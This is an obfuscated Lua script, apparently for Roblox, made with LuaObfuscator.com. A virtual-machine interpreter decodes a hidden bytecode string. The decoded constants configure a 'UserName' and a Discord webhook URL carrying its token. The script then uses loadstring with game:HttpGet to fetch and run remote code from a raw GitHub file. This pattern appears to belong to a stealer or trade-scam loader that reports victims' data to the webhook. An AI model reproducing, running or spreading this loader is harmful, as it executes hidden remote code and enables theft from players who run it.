--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v30,16));if v19 then local v97=v5(v68,v19);v19=nil;return v97;else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=0;local v70;while true do if (v69==(0 -0)) then v70=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 11 + 53)))) + (932 -(857 + 74)))) ;return v70-(v70%(569 -((1244 -(282 + 595)) + 201))) ;end end else local v71=(929 -(214 + (2350 -(1523 + 114))))^(v32-(1 + 0)) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + (17 -13) ;return (v40 * (16441815 + 335401)) + (v39 * 65536) + (v38 * (373 -(32 + 85))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,1,5 + (1202 -(1069 + 118)) ) * (((2175 -1216) -(892 + 65))^(75 -43))) + v41 ;local v45=v20(v42,38 -17 ,31);local v46=((v20(v42,32)==(1 -0)) and  -((767 -416) -(16 + 71 + 263))) or (181 -(67 + 113)) ;if (v45==(0 + 0)) then if (v44==0) then return v46 * (0 -0) ;else local v75=0 + 0 ;while true do if (v75==(0 -0)) then v45=953 -((1424 -622) + 150) ;v43=0 -0 ;break;end end end elseif (v45==(3712 -1665)) then return ((v44==(0 + 0 + 0)) and (v46 * ((998 -((1706 -(368 + 423)) + (257 -175)))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-((614 -(10 + 8)) + 427) ) * (v43 + (v44/(((7 -5) -0)^(494 -(416 + 26))))) ;end local function v25(v47)local v48=0 -0 ;local v49;local v50;while true do if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -(1 -0) );v18=v18 + v47 ;v48=440 -(145 + 293) ;end if ((432 -(44 + 386))==v48) then v50={};for v76=1487 -(998 + 488) , #v49 do v50[v76]=v2(v1(v3(v49,v76,v76)));end v48=(4 -3) + 2 ;end if (v48==0) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=773 -(201 + 571) ;end if (v48==(1141 -(116 + 1022))) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(2 -0)) then v56=nil;v57=nil;v51=3;end if (v51~=(1785 -(599 + 1185))) then else v54=nil;v55=nil;v51=1 + 1 ;end if ((3 + 0)~=v51) then else v58=nil;v59=nil;v51=578 -(507 + 67) ;end if ((1753 -(1013 + 736))~=v51) then else while true do if ((0 + 0)==v52) then local v94=0 -0 ;while true do if (v94==(3 -2)) then v52=1;break;end if (v94~=(867 -(550 + 317))) then else v53=0;v54=nil;v94=1;end end end if (v52==2) then local v95=0;while true do if (v95==(1 -0)) then v52=3;break;end if (v95==(0 -0)) then v57=nil;v58=nil;v95=2 -1 ;end end end if (v52==(286 -(134 + 151))) then local v96=1665 -(970 + 695) ;while true do if (v96==(0 -0)) then v55=nil;v56=nil;v96=1991 -(582 + 1408) ;end if (v96==(3 -2)) then v52=2;break;end end end if (v52==3) then v59=nil;while true do local v98=0 -0 ;while true do if (v98==1) then if (3==v53) then local v105=0 -0 ;while true do if (v105~=0) then else for v127=1825 -(1195 + 629) ,v23() do v55[v127-(1 -0) ]=v28();end return v57;end end end if ((242 -(187 + 54))~=v53) then else local v106=780 -(162 + 618) ;while true do if (v106==(0 + 0)) then v57={v54,v55,nil,v56};v58=v23();v106=1 -0 ;end if (v106==(1 + 0)) then v59={};v53=2;break;end end end break;end if (0~=v98) then else if (v53~=0) then else local v107=0;while true do if (v107==0) then v54={};v55={};v107=1637 -(1373 + 263) ;end if ((1001 -(451 + 549))==v107) then v56={};v53=1;break;end end end if (v53~=2) then else for v109=1 + 0 ,v58 do local v110=0 -0 ;local v111;local v112;local v113;while true do if (v110==1) then v113=nil;while true do if (v111~=0) then else local v176=0 -0 ;local v177;while true do if (v176==(1384 -(746 + 638))) then v177=0;while true do if (1==v177) then v111=1;break;end if (v177==(0 + 0)) then local v187=0 -0 ;while true do if (v187==1) then v177=1;break;end if (v187==0) then v112=v21();v113=nil;v187=342 -(218 + 123) ;end end end end break;end end end if (v111==(1582 -(1535 + 46))) then if (v112==1) then v113=v21()~=(0 + 0) ;elseif (v112==(1 + 1)) then v113=v24();elseif (v112~=3) then else v113=v25();end v59[v109]=v113;break;end end break;end if (0==v110) then v111=560 -(306 + 254) ;v112=nil;v110=1;end end end v57[3]=v21();for v114=1,v23() do local v115=0 + 0 ;local v116;local v117;local v118;while true do if (v115~=0) then else v116=0;v117=nil;v115=1 -0 ;end if ((1468 -(899 + 568))==v115) then v118=nil;while true do if (v116==0) then local v179=0;while true do if (v179==1) then v116=1;break;end if (0==v179) then v117=0 + 0 ;v118=nil;v179=2 -1 ;end end end if (v116==(604 -(268 + 335))) then while true do if (v117==0) then v118=v21();if (v20(v118,291 -(60 + 230) ,573 -(426 + 146) )==0) then local v182=0;local v183;local v184;local v185;local v186;while true do if (v182~=(0 + 0)) then else v183=0;v184=nil;v182=1;end if (v182==1) then v185=nil;v186=nil;v182=1458 -(282 + 1174) ;end if (v182~=2) then else while true do if (v183==(812 -(569 + 242))) then local v188=0 -0 ;local v189;while true do if (v188==0) then v189=0;while true do if (0~=v189) then else v186={v22(),v22(),nil,nil};if (v184==(1024 -(706 + 318))) then local v201=1251 -(721 + 530) ;local v202;while true do if (v201==0) then v202=0;while true do if ((1271 -(945 + 326))==v202) then v186[7 -4 ]=v22();v186[4]=v22();break;end end break;end end elseif (v184==1) then v186[3 + 0 ]=v23();elseif (v184==(702 -(271 + 429))) then v186[3 + 0 ]=v23() -((1502 -(1408 + 92))^16) ;elseif (v184~=3) then else local v207=1086 -(461 + 625) ;local v208;local v209;while true do if (v207==1) then while true do if (0==v208) then v209=1288 -(993 + 295) ;while true do if (v209~=(0 + 0)) then else v186[3]=v23() -(2^(1187 -(418 + 753))) ;v186[4]=v22();break;end end break;end end break;end if (v207==(0 + 0)) then local v210=0 + 0 ;while true do if (v210~=(1 + 0)) then else v207=1 + 0 ;break;end if (v210~=0) then else v208=529 -(406 + 123) ;v209=nil;v210=1770 -(1749 + 20) ;end end end end end v189=1 + 0 ;end if (v189==(1323 -(1249 + 73))) then v183=1 + 1 ;break;end end break;end end end if (v183==0) then local v190=1145 -(466 + 679) ;local v191;while true do if (v190==0) then v191=0 -0 ;while true do if (v191==1) then v183=2 -1 ;break;end if (0==v191) then local v200=1900 -(106 + 1794) ;while true do if (v200~=1) then else v191=1 + 0 ;break;end if (v200~=(0 + 0)) then else v184=v20(v118,2,8 -5 );v185=v20(v118,10 -6 ,120 -(4 + 110) );v200=585 -(57 + 527) ;end end end end break;end end end if (v183~=(1430 -(41 + 1386))) then else if (v20(v185,3,3)~=(104 -(17 + 86))) then else v186[4]=v59[v186[3 + 1 ]];end v54[v114]=v186;break;end if (v183~=(3 -1)) then else local v193=0;while true do if (v193==0) then if (v20(v185,2 -1 ,167 -(122 + 44) )==1) then v186[2]=v59[v186[2 -0 ]];end if (v20(v185,2,6 -4 )==(1 + 0)) then v186[3]=v59[v186[1 + 2 ]];end v193=1 -0 ;end if (v193~=(66 -(30 + 35))) then else v183=3;break;end end end end break;end end end break;end end break;end end break;end end end v53=3 + 0 ;end v98=1258 -(1043 + 214) ;end end end break;end end break;end if (v51==0) then v52=0;v53=nil;v51=3 -2 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (1==v93) then if (v91<=5) then if (v91<=2) then if (v91<=0) then v88[v90[2]]=v62[v90[3]];elseif (v91>1) then v88[v90[2]]=v90[3];else v82=v90[3];end elseif (v91<=3) then local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==1) then v83=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==2) then for v173=v122,v83 do local v174=0;while true do if (v174==0) then v125=v125 + 1 ;v88[v173]=v123[v125];break;end end end break;end if (v121==0) then v122=v90[2];v123,v124=v81(v88[v122](v13(v88,v122 + 1 ,v90[3])));v121=1;end end elseif (v91>4) then v88[v90[2]]=v90[3]~=0 ;else local v133=v90[2];local v134=v88[v90[3]];v88[v133 + 1 ]=v134;v88[v133]=v134[v90[4]];end elseif (v91<=8) then if (v91<=6) then local v126=0;while true do if (v126==4) then v82=v90[3];break;end if (v126==2) then v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v126=3;end if (v126==0) then v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v126=1;end if (v126==1) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v126=2;end if (v126==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v126=4;end end elseif (v91>7) then v62[v90[3]]=v88[v90[2]];else do return;end end elseif (v91<=10) then if (v91>9) then local v140;local v141,v142;local v143;local v144;v62[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v62[v90[3]];v82=v82 + 1 ;v90=v78[v82];v144=v90[2];v143=v88[v90[3]];v88[v144 + 1 ]=v143;v88[v144]=v143[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v144=v90[2];v141,v142=v81(v88[v144](v13(v88,v144 + 1 ,v90[3])));v83=(v142 + v144) -1 ;v140=0;for v170=v144,v83 do v140=v140 + 1 ;v88[v170]=v141[v140];end v82=v82 + 1 ;v90=v78[v82];v144=v90[2];v88[v144]=v88[v144](v13(v88,v144 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];else v88[v90[2]]();end elseif (v91>11) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else local v154=v90[2];v88[v154]=v88[v154](v13(v88,v154 + 1 ,v83));end v82=v82 + 1 ;break;end end end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030C3O006C6F7465646E756D62657233030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F566573742O792F4469616D6F6E6450726F746563742F6D61696E2F4A757374696E652E73637269707403083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134392O31363032353433353037303531342F64754E7467574C413661423477396E7530486A764150536C392O3762354C676B69674F676148635467567A6D7A697831643952394B765477546C323959415778685F6D3000173O0012023O00013O00260C3O000E000100020004013O000E0001001202000100043O00120A000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O0016000100260C3O0001000100010004013O00010001001202000100043O001206000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00073O00017O00",v9(),...);
